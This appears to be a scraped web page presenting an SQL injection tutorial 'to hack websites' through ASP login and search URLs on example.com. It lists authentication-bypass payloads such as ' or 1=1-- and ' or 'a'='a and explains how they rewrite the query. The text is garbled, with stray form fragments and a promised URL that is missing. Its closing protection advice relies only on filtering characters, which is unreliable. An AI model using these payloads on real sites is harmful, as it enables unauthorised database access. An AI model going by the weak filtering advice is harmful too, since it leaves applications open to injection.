|SQL injection tutorial to hack websites | Hacking website databse|
< i n p u t type=hidden name=user v a l u e=xyz>
< / F O R M>
Now how to detect that this URL is vulnerable or not:
http://example.com/login.asp?id=hi’ or 1=1–
< i n p u t type=hidden name=abc value=”hi’ or 1=1–“>
< / F O R M >
Take an asp page that will link you to another page with the following URL:
Here this request fires following query on the database in background.
SELECT * FROM TABLE-NAME WHERE category=’sports’
So, this query returns all the possible entries from table ‘search’ which comes under the category ‘sports’.
Now, assume that we change the URL into something like this:
http://example.com/search.asp?category=sports’ or 1=1–
SELECT * FROM search WHERE category=’sports’ or 1=1–‘
A double dash “–” tell MS SQL server to ignore the rest of the query, which will get rid of the last hanging single quote (‘).
Sometimes, it may be possible to replace double dash with single hash “#”.
However, if it is not an SQL server, or you simply cannot ignore the rest of the query, you also may try
‘ or ‘a’=’a
It should return the same result.
Depending on the actual SQL query, you may have to try some of these possibilities:
‘ or 1=1–
” or 1=1–
‘ or ‘a’=’a
” or “a”=”a
‘) or (‘a’=’a
How to protect you own websites from SQL injection?
Filter out character like ‘ ” – / ; NULL, etc. in all strings from:
* Input from users
* Parameters from URL
* Values from cookie